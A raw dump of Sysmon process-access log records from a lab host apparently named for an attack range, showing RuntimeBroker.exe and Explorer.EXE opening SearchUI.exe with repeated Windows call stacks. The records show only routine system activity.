13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Inter
nal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
